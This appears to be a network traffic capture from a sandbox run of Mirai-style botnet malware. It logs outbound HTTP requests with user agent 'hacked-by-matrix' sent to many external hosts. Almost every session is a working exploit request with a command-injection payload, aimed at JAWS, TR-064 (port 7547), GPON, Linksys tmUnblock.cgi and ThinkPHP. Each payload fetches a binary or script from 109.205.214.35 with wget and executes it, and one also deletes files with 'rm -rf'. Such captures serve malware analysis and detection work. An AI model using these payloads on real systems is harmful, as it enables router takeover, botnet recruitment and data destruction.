                                                        Content-Length: 119
                                                        Date: Thu, 21 Mar 2024 04:23:34 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 33 3a 20 75 6e 6b 6e 6f 77 6e 20 6d 65 74 68 6f 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 33 3a 20 75 6e 6b 6e 6f 77 6e 20 6d 65 74 68 6f 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 503: unknown method</title></head><body><h1>Error 503: unknown method</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1949192.168.2.1340706185.37.252.13680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.725550890 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:35.855351925 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:36.070107937 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:35 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1950192.168.2.1348644118.39.243.617547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.805162907 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:36.301882982 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1951192.168.2.1358174212.186.237.189443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841434002 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1952192.168.2.1346228212.177.199.252443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841434002 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1953192.168.2.13579685.80.216.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841480970 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1954192.168.2.134317642.133.103.194443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841519117 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1955192.168.2.1345564212.28.19.235443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841519117 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1956192.168.2.1358820212.99.159.129443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841568947 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1957192.168.2.135228442.252.142.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841613054 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1958192.168.2.133297442.117.142.136443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841636896 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1959192.168.2.1354204118.173.254.63443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841645002 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1960192.168.2.135594842.10.253.6443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841665030 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1961192.168.2.1357554212.150.9.122443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.841677904 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1962192.168.2.133288279.141.59.1917547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.923566103 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:35.154092073 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 07:23:34 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1963192.168.2.1341430177.34.93.2067547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.934075117 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1964192.168.2.1337828172.67.145.2218080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.955172062 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1965192.168.2.1345240152.170.146.67547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.970701933 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1966192.168.2.1341300221.150.92.1847547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.985874891 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:36.463346958 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1967192.168.2.1349958183.127.245.2237547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.991940022 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1968192.168.2.1343114175.241.76.1467547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.992027998 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1969192.168.2.135706895.71.118.14980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:35.153959036 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:35.388248920 CET317INHTTP/1.1 400 Bad Request
                                                        Server: Web server
                                                        Date: Tue, 12 Oct 2021 09:54:50 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 155
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1970192.168.2.133350079.141.59.1917547
                                                        TimestampBytes transferredDirectionData
